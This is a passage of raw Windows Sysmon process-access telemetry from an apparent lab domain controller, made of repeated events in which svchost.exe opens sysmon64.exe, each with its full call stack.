15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.